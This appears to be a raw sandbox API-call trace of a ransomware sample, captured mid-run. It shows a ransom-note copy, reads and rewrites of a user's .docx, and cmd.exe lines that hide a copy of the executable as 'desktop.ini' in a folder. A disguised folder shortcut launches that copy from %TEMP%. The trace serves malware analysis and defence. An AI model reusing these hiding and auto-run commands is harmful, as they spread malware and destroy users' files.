\"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0133.160] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: 
lpsz="[TO_PATH]") returned 0x9 [0133.160] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xa3c, dwThreadId=0xa40)) returned 1 [0133.161] CloseHandle (hObject=0x110) returned 1 [0133.161] CloseHandle (hObject=0x114) returned 1 [0133.161] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0xffffffff [0133.162] GetLastError () returned 0x2 [0133.162] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0133.164] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0133.164] CompareStringW (Locale=0x409, 
dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.164] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.164] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.164] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.164] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0133.165] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0133.165] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 
[0133.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd") returned 0x27 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0133.165] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0133.165] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xa44, dwThreadId=0xa4c)) returned 1 [0133.184] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0133.900] CloseHandle (hObject=0x114) returned 1 [0133.900] CloseHandle (hObject=0x110) returned 1 [0133.900] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.900] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.901] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.901] GetTickCount () returned 0x2a7f1 [0133.901] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19069000482) returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") 
returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x57\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x53\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0133.901] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: 
lpsz="[DIR_NAME]") returned 0xa [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5d | out: lpsz="EXPLORER.EXE \"XJ2FMD\" & TYPE \"XJ2FMD\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5d [0133.901] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5e | out: lpsz="EXPLORER.EXE \"XJ2FMD\" & TYPE \"XJ2FMD\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5e [0133.901] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0133.901] CoInitialize (pvReserved=0x0) returned 0x0 [0133.902] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0133.903] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0133.903] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0133.903] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C 
explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\desktop.ini\" > \"%TEMP%\\Ip8WTSwq.exe\" && \"%TEMP%\\Ip8WTSwq.exe\"") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0133.905] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0133.905] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd.lnk", fRemember=0) returned 0x0 [0133.918] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0133.918] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0133.918] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0133.918] CoUninitialize () [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\tq3ypk_6c.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0133.919] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19070887715) returned 1 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x803f [0133.921] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8527 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8527 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.923] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4292, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4292, lpOverlapped=0x0) returned 1 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.924] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4292, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4292, lpOverlapped=0x0) returned 1 [0133.924] SetFilePointer (in: hFile=0x114, lDistanceToMove=-17042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4295 [0133.924] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4292, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4292, lpOverlapped=0x0) returned 1 [0133.924] SetFilePointer (in: hFile=0x114, lDistanceToMove=-17042, 
